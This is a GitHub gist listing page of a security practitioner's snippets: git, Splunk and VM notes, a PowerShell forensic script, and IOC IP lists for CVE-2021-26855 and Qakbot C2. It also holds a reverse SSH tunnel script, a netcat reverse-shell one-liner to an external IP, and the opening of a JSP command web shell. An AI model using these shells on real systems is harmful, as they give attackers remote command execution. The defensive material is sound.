Skip to content

Instantly share code, notes, and snippets.

View christian-taillon's full-sized avatar
{"input":"coffe","output":"solutions"}

christian christian-taillon

{"input":"coffe","output":"solutions"}
View GitHub Profile
@christian-taillon
christian-taillon / gist:3f5c27d67387c3ac74ceff005682d511
Created March 2, 2021 17:26
Updated Master Git Branch to Main
# the move to main from master has caused me a few headaches
# Azure DevOps uses main for example
# but my Git client uses master
# it would cause a lot of conflicts.
# here are some steps to move master to main.
# move master branch to main
git branch -m master main
# push the new main to your repo
@christian-taillon
christian-taillon / CVE-2021-26855
Created March 9, 2021 03:46
threat-actor source IP IOC's related to CVE-2021-26855
165.232.154.116,
157.230.221.198,
104.248.49.97,
5.2.69.14,
91.192.103.43,
192.81.208.169,
157.230.221.198,
161.35.1.225,
167.179.67.3,
104.225.219.16
@christian-taillon
christian-taillon / downloadedFiles_zoneIdentifier.ps1
Last active June 7, 2021 16:24
This script is inelegant but straightforward and identifies downloaded files and the url from which the file was downloaded (if ADS Zone Identifier is available) in the System32 directory. Additionally, it also identifies .iso and .img files in the user's download directory. This is intended for Incident Responders, SOC Analysts, and Threat Rese…
# ADS Zone Identifier for Downloaded Files
# Date: 06-07-2021
# Author to blame when it breaks: Christian Taillon
# Description: This script is inelegant but straightforward and identifies downloaded files and the url from which the file was downloaded (if ADS Zone Identifier is available) in the System32 directory. Additionally, it also identifies .iso and .img files in the user's download directory. This is intended for Incident Responders, SOC Analysts, and Threat Researchers. I attempt to remove some popular OS files for those of us who do a terrible job at deleting huge .img files after they have served their purpose.
# set varriables
New-Variable -Name "sys32_path" -Value "C:\Windows\System32\*"
New-Variable -Name "iso_downloads_path" -Value "C:\Users\*\Downloads\*.iso"
New-Variable -Name "img_downloads_path" -Value "C:\Users\*\Downloads\*.img"
@christian-taillon
christian-taillon / eventtypes.conf
Last active July 19, 2021 16:52
Varonis Add-on Breaking Tag Searches The TA-Varonis-DatAlert Add-on for Splunk version 1.2.0 will break Splunk's ability to search with tags used by the app. The issue is in the eventtypes.conf where macros are used in event definitions. This is something that is not supported in Splunk. Eventtypes need to be called when tags are used in searche…
[possible_credential_stuffing_attack_from_a_single_source]
search = sourcetype=varonis:ta cef_vendor="Varonis Inc." cs2="Abnormal access behavior: possible credential stuffing attack from a single source"
[possible_distributed_credential_stuffing_attack]
search = sourcetype=varonis:ta cef_vendor="Varonis Inc." cs2="Abnormal access behavior: possible distributed credential stuffing attack"
[access_to_atypical_mailboxes]
search = sourcetype=varonis:ta cef_vendor="Varonis Inc." cs2="Abnormal admin behavior: access to atypical mailboxes"
[accumulative_increase_in_amount_of_devices_accessed]
@christian-taillon
christian-taillon / simple_reverse_ssh_shell.sh
Created November 11, 2021 00:03
A very simple way to get a reverse shell. Often used adversarially, I use it for managing Linux hosts behind a Firewall. Your security product may attempt to prevent this.
# on host you want to controll
echo "start sshd, just in case"
sudo systemctl start sshd
echo "open shell with reverse option for 43022 (random unassigned port) to 22 (ssh)"
ssh -R 43022:localhost:22 $USER$@$REMOTEHOST$
# on device you have controll over
ssh localhost -p 43022
  1. Extract the OVA tar xvf ./$VM_TEMPLATE_NAME.ova
  2. Use qemu-ing to convert to qcow2 qemu-img convert -O qcow2 ./$VM_TEMPLATE_NAME.vmdk /<desired_location>/$VM_TEMPLATE_NAME.qcow2

Create a new Guest VM in virt-manager, provide the directory containing the qcow2 file as storage path, and create the VM.

@christian-taillon
christian-taillon / NetcatReverseShell.md
Created November 29, 2021 21:57
This is a simple note that denotes arguably one of the simplest methods of creating a Reserve Shell.

Victim nc -c /bin/bash you_external_ip <unfiltered port

Your Host nc -l -p -vvv

You need spice-vdagent

Debian or Kali Linux installed to as KVM guests do not automatically have qemu-guest-agent or spice-vdagent installed. This will prevent seamless movement of the mouse cursor between the guest and host desktop in Virtual Machine Manager (requiring the use of a Ctrl-Alt to release the cursor from the guest window).

To cure this, install both qemu-guest-agent and spice-vdagent on each guest and reboot (the guests).

$ sudo apt install qemu-guest-agent
$ sudo apt install spice-vdagent
@christian-taillon
christian-taillon / cmd.jsp
Created April 8, 2022 18:26 — forked from nikallass/cmd.jsp
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
@christian-taillon
christian-taillon / qbot_c2.txt
Created October 10, 2022 01:05
Qakbot C2 Fall Campaigns
102.189.184.12
102.190.190.242
103.173.121.17
105.184.13.131
131.100.40.13
134.35.12.0
139.228.33.176
14.168.180.223
156.199.90.139
156.205.3.210